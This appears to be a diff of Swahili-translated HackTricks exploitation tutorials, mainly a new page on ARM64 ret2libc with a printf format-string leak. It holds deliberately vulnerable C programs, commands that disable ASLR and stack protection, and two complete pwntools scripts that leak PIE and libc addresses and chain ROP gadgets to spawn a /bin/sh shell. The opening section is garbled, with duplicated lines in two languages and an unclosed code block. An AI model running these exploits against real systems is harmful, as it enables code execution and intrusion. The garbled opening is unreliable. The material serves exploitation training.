Kwa anwani iliyotolewa na Kifaa cha Moja unahitaji **kuongeza anwani ya msingi ambapo `libc`** imepakia.
Kwa anwani iliyotolewa na One Gadget unahitaji **kuongeza anwani ya msingi ambapo `libc`** imepakia.
{% hint style="success" %}
Kifaa cha Moja ni **msaada mzuri kwa mbinu za Kuandika kwa Uvamizi 2 Kutekeleza** na inaweza **kurahisisha minyororo ya ROP** kwani unahitaji kuita anwani moja tu (na kutimiza mahitaji).
One Gadget ni **msaada mzuri kwa mbinu za Arbitrary Write 2 Exec** na inaweza **kurahisisha ROP chains** kwani unahitaji kuita anwani moja tu (na kutimiza mahitaji).
{% endhint %}
## Kifaa cha Hasira
### ARM64
Kutoka kwenye [**repo ya github**](https://github.com/ChrisTheCoolHut/angry\_gadget): Imeisukumwa na [OneGadget](https://github.com/david942j/one\_gadget) kifaa hiki kimeandikwa kwa python na kutumia [angr](https://github.com/angr/angr) kujaribu vikwazo kwa vifaa vinavyotekeleza `execve('/bin/sh', NULL, NULL)`\
Ikiwa umekwisha jaribu vifaa kutoka kwa Kifaa cha Moja, Kifaa cha Hasira hutoa vingi zaidi na vikwazo vilivyozidi kujaribu!
Repo ya github inataja kuwa **ARM64 inaungwa mkono** na zana, lakini unapoendesha katika libc ya Kali 2023.3 **haipati kifaa chochote**.
## Angry Gadget
Kutoka kwenye [**repo ya github**](https://github.com/ChrisTheCoolHut/angry\_gadget): Imeinspiriwa na [OneGadget](https://github.com/david942j/one\_gadget) zana hii imeandikwa kwa python na hutumia [angr](https://github.com/angr/angr) kujaribu vikwazo kwa vifaa vinavyotekeleza `execve('/bin/sh', NULL, NULL)`\
Ikiwa umekwisha jaribu vifaa kutoka OneGadget, Angry Gadget inatoa vingi zaidi na vikwazo vilivyozidi kujaribu!
```bash
pip install angry_gadget

225
binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md Normal file
View file

@ -0,0 +1,225 @@
# Ret2lib + Kuvuja kwa Printf - arm64
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Ret2lib - Kupitisha NX na ROP (bila ASLR)
```c
#include <stdio.h>
void bof()
{
char buf[100];
printf("\nbof>\n");
fgets(buf, sizeof(buf)*3, stdin);
}
void main()
{
printfleak();
bof();
}
```
Kusanya bila ya kengele:
```bash
clang -o rop-no-aslr rop-no-aslr.c -fno-stack-protector
# Disable aslr
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```
### Pata kigezo
### Kigezo cha x30
Kwa kutumia **`pattern create 200`**, kuunda kigezo, na kuangalia kigezo kwa kutumia **`pattern search $x30`** tunaweza kuona kwamba kigezo ni **`108`** (0x6c).
<figure><img src="../../../.gitbook/assets/image (1215).png" alt="" width="563"><figcaption></figcaption></figure>
Tukitazama kazi kuu iliyovunjwa tunaweza kuona kwamba tunataka **kupiga** maelekezo ya kwenda moja kwa moja kwa **`printf`**, ambayo kigezo chake kutoka kwenye mahali ambapo binary imepakuliwa ni **`0x860`**:
<figure><img src="../../../.gitbook/assets/image (1216).png" alt=""><figcaption></figcaption></figure>
### Pata mfumo na string ya `/bin/sh`
Kwa kuwa ASLR imelemazwa, anwani zitakuwa zile zile daima:
<figure><img src="../../../.gitbook/assets/image (1219).png" alt=""><figcaption></figcaption></figure>
### Pata Vifaa
Tunahitaji kuwa na anwani ya string **`/bin/sh`** kwenye **`x0`** na kuita **`system`**.
Kwa kutumia rooper, kifaa cha kuvutia kilipatikana:
```
0x000000000006bdf0: ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;
```
Hifadhi hii itapakia `x0` kutoka **`$sp + 0x18`** na kisha kupakia anwani za x29 na x30 kutoka sp na kuruka kwenda x30. Kwa hivyo kwa kifaa hiki tunaweza **kudhibiti hoja ya kwanza na kisha kuruka kwa mfumo**.
### Kudukua
```python
from pwn import *
from time import sleep
p = process('./rop') # For local binary
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
libc.address = 0x0000fffff7df0000
binsh = next(libc.search(b"/bin/sh")) #Verify with find /bin/sh
system = libc.sym["system"]
def expl_bof(payload):
p.recv()
p.sendline(payload)
# Ret2main
stack_offset = 108
ldr_x0_ret = p64(libc.address + 0x6bdf0) # ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;
x29 = b"AAAAAAAA"
x30 = p64(system)
fill = b"A" * (0x18 - 0x10)
x0 = p64(binsh)
payload = b"A"*stack_offset + ldr_x0_ret + x29 + x30 + fill + x0
p.sendline(payload)
p.interactive()
p.close()
```
## Ret2lib - Kupita NX, ASLR & PIE kwa kutumia printf kuvuja kutoka kwenye steki
```c
#include <stdio.h>
void printfleak()
{
char buf[100];
printf("\nPrintf>\n");
fgets(buf, sizeof(buf), stdin);
printf(buf);
}
void bof()
{
char buf[100];
printf("\nbof>\n");
fgets(buf, sizeof(buf)*3, stdin);
}
void main()
{
printfleak();
bof();
}
```
Kusanya **bila canary**:
```bash
clang -o rop rop.c -fno-stack-protector -Wno-format-security
```
### PIE na ASLR lakini hakuna canary
* Raundi 1:
* Kuvuja kwa PIE kutoka kwenye stack
* Kutumia bof kurudi kwa main
* Raundi 2:
* Kuvuja kwa libc kutoka kwenye stack
* ROP: ret2system
### Kuvuja kwa Printf
Kuweka kizuizi kabla ya kuita printf inawezekana kuona kuwa kuna anwani za kurudi kwa binary kwenye stack na pia anwani za libc:
<figure><img src="../../../.gitbook/assets/image (1212).png" alt="" width="563"><figcaption></figcaption></figure>
Kujaribu offsets tofauti, **`%21$p`** inaweza kuvuja anwani ya binary (PIE bypass) na **`%25$p`** inaweza kuvuja anwani ya libc:
<figure><img src="../../../.gitbook/assets/image (1220).png" alt="" width="440"><figcaption></figcaption></figure>
Kwa kutoa anwani iliyovuja ya libc na anwani ya msingi ya libc, inawezekana kuona kuwa **offset** ya **anwani iliyovuja kutoka kwa msingi ni `0x49c40`.**
### Offset ya x30
Angalia mfano uliopita kwani bof ni sawa.
### Tafuta Gadgets
Kama katika mfano uliopita, tunahitaji kuwa na **`x0`** anwani ya string **`/bin/sh`** na kuita **`system`**.
Kutumia rooper gadget nyingine ya kuvutia ilipatikana:
```
0x0000000000049c40: ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret;
```
Hifadhi hii itapakia `x0` kutoka **`$sp + 0x78`** na kisha itapakia anwani za x29 na x30 kutoka sp na kuruka kwenda x30. Kwa hivyo kwa kifaa hiki tunaweza **kudhibiti hoja ya kwanza na kisha kuruka kwa mfumo**.
### Kudukua
```python
from pwn import *
from time import sleep
p = process('./rop') # For local binary
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
def leak_printf(payload, is_main_addr=False):
p.sendlineafter(b">\n" ,payload)
response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
if is_main_addr:
response = response[:-4] + b"0000"
return int(response, 16)
def expl_bof(payload):
p.recv()
p.sendline(payload)
# Get main address
main_address = leak_printf(b"%21$p", True)
print(f"Bin address: {hex(main_address)}")
# Ret2main
stack_offset = 108
main_call_printf_offset = 0x860 #Offset inside main to call printfleak
print("Going back to " + str(hex(main_address + main_call_printf_offset)))
ret2main = b"A"*stack_offset + p64(main_address + main_call_printf_offset)
expl_bof(ret2main)
# libc
libc_base_address = leak_printf(b"%25$p") - 0x26dc4
libc.address = libc_base_address
print(f"Libc address: {hex(libc_base_address)}")
binsh = next(libc.search(b"/bin/sh"))
system = libc.sym["system"]
# ret2system
ldr_x0_ret = p64(libc.address + 0x49c40) # ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret;
x29 = b"AAAAAAAA"
x30 = p64(system)
fill = b"A" * (0x78 - 0x10)
x0 = p64(binsh)
payload = b"A"*stack_offset + ldr_x0_ret + x29 + x30 + fill + x0
p.sendline(payload)
p.interactive()
```
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>